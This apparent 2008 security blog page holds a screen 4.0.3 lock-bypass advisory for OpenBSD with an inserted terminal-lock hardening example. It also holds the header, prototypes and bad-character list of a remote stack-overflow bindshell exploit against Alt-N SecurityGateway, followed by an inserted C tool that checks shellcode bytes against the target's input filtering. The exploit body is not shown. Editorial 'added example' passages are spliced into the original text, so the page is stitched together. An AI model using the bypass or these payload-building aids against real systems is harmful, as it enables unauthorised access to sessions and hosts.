Saturday, June 21, 2008

screen 4.0.3 Local Authentication Bypass

Author: Rembrandt
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current, which will become OpenBSD 4.4)
Type: Local
Type: Authentication Bypass

screen is vulnerable to an authentication bypass which allows local attackers
to gain access to a session (and the shell inside it) in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64, but given the
nature of the behaviour of screen and OpenBSD it should be
architecture/version independent for now.


How to check this?

Lock screen using ctrl-a x (screen's lockscreen command)
Choose a password
Confirm the password

Screen asks for a password to unlock the screen.
Just press ctrl+c and, if you like, screen -x to reattach the screen session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password:
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$

Because of the nature of the lock you are not really able to lock your shell
this way: screen will never ask you for the password.
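The transcript above shows two separate weaknesses: the lock process dies on Ctrl-C (the "Password:" prompt is followed directly by the outer "$" prompt), and the session can then be reattached with screen -x from any shell running as the same user. What follows is an added example, not screen's code and not part of this advisory, of a minimal terminal lock in C. It shows the two things a keyboard lock must do so a plain Ctrl-C cannot kill it (ignore the interrupt signals, and clear ISIG on the tty so the driver never generates them), and it spells out the limit: none of that helps against screen -x from a second terminal, because the lock guards the attached display, not the session. The function names and flag choices are this example's own.

```c
/* Added example: a minimal terminal lock in C. This is not screen's code and
 * not part of the advisory; the function names and flag choices are this
 * example's own. It shows what a keyboard lock must do so a plain Ctrl-C
 * cannot kill it, and why none of that stops `screen -x` from another tty. */
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>

/* The weak case needs no code: with SIGINT at its default disposition and
 * ISIG set on the tty, Ctrl-C becomes SIGINT, the lock process dies and the
 * shell behind it is back ("Password:" followed by "$" in the transcript). */

/* Hardened lock, part 1: ignore the signals a tty can raise from the
 * keyboard. Returns the number of dispositions installed, -1 on error. */
int lock_ignore_tty_signals(void)
{
    const int sigs[] = { SIGINT, SIGQUIT, SIGTSTP, SIGHUP };
    struct sigaction sa;
    int n = 0;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = SIG_IGN;
    sigemptyset(&sa.sa_mask);
    for (size_t i = 0; i < sizeof sigs / sizeof sigs[0]; i++) {
        if (sigaction(sigs[i], &sa, NULL) != 0)
            return -1;
        n++;
    }
    return n;
}

/* Hardened lock, part 2: local-mode flags for the locked tty. With ISIG
 * cleared, Ctrl-C, Ctrl-Z and Ctrl-\ arrive as ordinary bytes instead of
 * signals; ECHO off keeps the password off the screen; ICANON stays on so
 * the password is read as a line. */
tcflag_t lock_lflags(tcflag_t lflag)
{
    return (lflag & ~(tcflag_t)(ISIG | ECHO)) | ICANON;
}

/* Apply lock_lflags() to fd, saving the previous settings for restore.
 * Returns 0 on success and -1 when fd is not a terminal: a lock that
 * "succeeds" without a tty has locked nothing, so callers must stop. */
int lock_tty(int fd, struct termios *saved)
{
    struct termios t;

    if (tcgetattr(fd, &t) != 0)
        return -1;
    if (saved)
        *saved = t;
    t.c_lflag = lock_lflags(t.c_lflag);
    return tcsetattr(fd, TCSAFLUSH, &t) == 0 ? 0 : -1;
}

/* Self-check to run before prompting: 1 if SIGINT is ignored, 0 if a
 * Ctrl-C would still kill the lock, -1 on error. */
int sigint_ignored(void)
{
    struct sigaction cur;

    if (sigaction(SIGINT, NULL, &cur) != 0)
        return -1;
    return cur.sa_handler == SIG_IGN ? 1 : 0;
}

int main(void)
{
    struct termios saved;

    printf("before hardening: SIGINT ignored = %d\n", sigint_ignored());
    if (lock_ignore_tty_signals() < 0) {
        perror("sigaction");
        return 1;
    }
    printf("after hardening:  SIGINT ignored = %d\n", sigint_ignored());

    if (lock_tty(STDIN_FILENO, &saved) != 0) {
        fprintf(stderr, "stdin is not a tty; refusing to pretend to lock\n");
        return 1;
    }
    printf("tty locked: ISIG and ECHO off; Ctrl-C has no effect here.\n");
    /* Caveat: the lock only guards this terminal. A second shell running as
     * the same uid can still `screen -x` the session, because that attach
     * never passes through the locked display. Lock the login, not screen. */
    tcsetattr(STDIN_FILENO, TCSAFLUSH, &saved);
    return 0;
}
```

Run it from an interactive terminal to see Ctrl-C stop working once the flags are applied; run it with stdin redirected and it refuses, which is the behaviour a real lock should have rather than reporting success on a non-tty. The second weakness in the advisory, reattaching with screen -x, is not a lock-program bug at all and cannot be fixed from inside the lock.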

Of course this also works if you get access to an SSH session which has a locked
screen running. So in case you have locked your screen session which contains
an open SSH session to a host where you also have a locked screen session,
you might have no password protection at all if all systems are OpenBSD.
That is just another example. What should matter to you is the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/whatever.

It is known to work and I mentioned the OS.
Still, it is known that it worked against some scary Linux distributions
which are not really common.

All security websites which report this as a fake may consider updating their
reports instead of simply claiming wrong things.

Alt-N SecurityGateway v1.00-1.01

/*
 * ----------------------------------------
* Target : Alt-N SecurityGateway v1.00-1.01
* ----------------------------------------
* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
* Exploit date : 11.06.2008-14.06.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
 * Details : Obtaining the overflow and crashing the application is a piece of cake.
 * Making working code execution here is hell. First we can see that
 * the username, before overflowing the buffer, passes through some functions
 * that change and restrict some useful chars. Firstly the buffer gets
 * lowercased, so the overflow must not contain uppercase chars :( . So I decided
 * to use some encoders for the payload like nonupper and nonalpha from MSF.
 * The nonupper one uses the `@` (0x40) char, which the app doesn't accept at all.
 * The nonalpha encoder's decoder stub and the generated body always contained
 * 0xC0, 0xC1, 0x80, 0x81, which were translated to 0xE0, 0xE1,
 * 0x90, 0x91. I don't know, maybe this char translation was due to my Russian locale.
 * After a few days of work I came up with the required bindshell, which bypasses
 * all restricted chars and executes. Thx to skylined for his alpha tool.
* Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E
* 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0
* 0xC1 0xC2 0x80 0x81
* ----------------------------------------
* Thanks to:
* 1. securfrog ( )
* 2. ALPHA 2: Zero-tolerance ( )
* 3. The Metasploit project ( http://metasploit.com )
* 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com )
************************************************************************************
 * This was written for educational purposes only. Use it at your own risk. The author will not be
 * responsible for any damage caused by this code.
*/

/* The header names were lost when this page was extracted; the five below
 * are the ones the visible code needs (Winsock2 for the socket calls and
 * the ws2_32 pragma, plus the C runtime headers). */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib,"ws2_32")


void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);

void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);

int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);

struct _buf
{
    unsigned char * ptr;
    unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
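The exploit header above describes three constraints on the payload: the username is lowercased before it reaches the stack, `@` (0x40) is rejected outright, and a handful of high bytes are rewritten (0xC0/0xC1 to 0xE0/0xE1, 0x80/0x81 to 0x90/0x91). Before spending days on encoders it pays to be able to check a candidate buffer against exactly those constraints offline. The following is an added example and not part of Heretic2's exploit: it carries the published bad-character list, models the byte translation the header reports (A-Z lowering plus the four observed high-byte remaps, nothing more, so it is not a general code-page tolower()), and reports where a buffer would be altered or rejected. The function names and the sample payloads are this example's own, constructed for illustration.

```c
/* Added example, not part of the original exploit. Models the input
 * filtering the exploit header describes and checks payload bytes against
 * it. Function names and sample buffers are this example's assumptions. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Bad characters exactly as listed in the header (the duplicate 0x40
 * collapsed to one entry). */
static const unsigned char BADCHARS[] = {
    0x00, 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A,
    0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56,
    0x57, 0x58, 0x59, 0x5A, 0x7B, 0xAA, 0xC0, 0xC1, 0xC2, 0x80, 0x81
};

int is_badchar(unsigned char c)
{
    for (size_t i = 0; i < sizeof BADCHARS; i++)
        if (BADCHARS[i] == c)
            return 1;
    return 0;
}

/* Model of the target's transformation as the header reports it: the buffer
 * is lowercased ('A'..'Z' become 'a'..'z') and the four high bytes the
 * author observed are remapped. Everything else passes unchanged. This
 * deliberately encodes only what the header states. */
unsigned char model_translate(unsigned char c)
{
    if (c >= 0x41 && c <= 0x5A)
        return (unsigned char)(c + 0x20);
    if (c == 0xC0 || c == 0xC1)
        return (unsigned char)(c + 0x20);   /* observed: -> 0xE0, 0xE1 */
    if (c == 0x80 || c == 0x81)
        return (unsigned char)(c + 0x10);   /* observed: -> 0x90, 0x91 */
    return c;
}

/* Scan buf and record up to max offsets of bytes that are either on the
 * bad list or would not survive model_translate() unchanged. Returns the
 * total number of such bytes (which may exceed max). */
size_t check_payload(const unsigned char *buf, size_t len,
                     size_t *offsets, size_t max)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++) {
        if (is_badchar(buf[i]) || model_translate(buf[i]) != buf[i]) {
            if (hits < max)
                offsets[hits] = i;
            hits++;
        }
    }
    return hits;
}

/* 1 if the payload reaches the stack exactly as sent, else 0. */
int payload_survives(const unsigned char *buf, size_t len)
{
    return check_payload(buf, len, NULL, 0) == 0;
}

/* Constructed sample: an x86-style stub with an uppercase byte, a NUL and a
 * 0xC0 mixed in, as an encoder unaware of the lowering might emit. */
static const unsigned char SAMPLE_RAW[] = {
    0x31, 0xC9, 0x64, 0x8B, 0x41, 0x30, 0x00, 0xC0, 0x90 };
static const size_t SAMPLE_RAW_LEN = sizeof SAMPLE_RAW;

/* Constructed sample: lowercase / non-alpha bytes only. */
static const unsigned char SAMPLE_CLEAN[] = {
    0x31, 0xC9, 0x64, 0x8B, 0x71, 0x30, 0x90, 0x90 };
static const size_t SAMPLE_CLEAN_LEN = sizeof SAMPLE_CLEAN;

int main(void)
{
    size_t off[16];
    size_t n = check_payload(SAMPLE_RAW, SAMPLE_RAW_LEN, off, 16);

    printf("raw: %zu byte(s) would be rejected or rewritten\n", n);
    for (size_t i = 0; i < n && i < 16; i++)
        printf("  offset %zu: 0x%02X %s\n", off[i], SAMPLE_RAW[off[i]],
               is_badchar(SAMPLE_RAW[off[i]]) ? "rejected (bad char)"
                                              : "rewritten by lowering");
    printf("clean: survives = %d\n",
           payload_survives(SAMPLE_CLEAN, SAMPLE_CLEAN_LEN));
    return 0;
}
```

Feed the output of an encoder to check_payload() before testing against the target: any non-zero count means the decoder stub or body will not arrive intact, which is the symptom the header describes for the stock nonalpha encoder (its 0xC0/0xC1/0x80/0x81 bytes came out changed).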